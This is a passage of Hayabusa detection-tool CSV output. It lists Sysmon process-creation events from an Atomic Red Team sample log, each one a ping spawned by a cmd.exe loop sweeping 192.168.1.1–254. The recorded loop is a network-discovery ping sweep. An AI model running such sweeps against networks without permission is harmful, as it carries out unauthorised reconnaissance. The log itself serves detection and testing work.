LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:57.558 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:58.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:58.457 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:59.001 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:59.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.063 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.940 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:01.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:02.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:02.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:03.059 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:03.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:04.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:04.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:05.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:05.516 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:06.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:06.440 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:07.053 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 
-w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:07.413 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:08.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:08.500 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:09.012 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:09.474 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:10.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:10.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 
747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:11.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:11.504 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:12.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:12.547 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:13.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:13.489 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:14.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:14.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:15.051 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:15.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:16.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:16.584 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:17.041 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:17.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.509 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.990 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:19.541 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:20.006 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:20.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 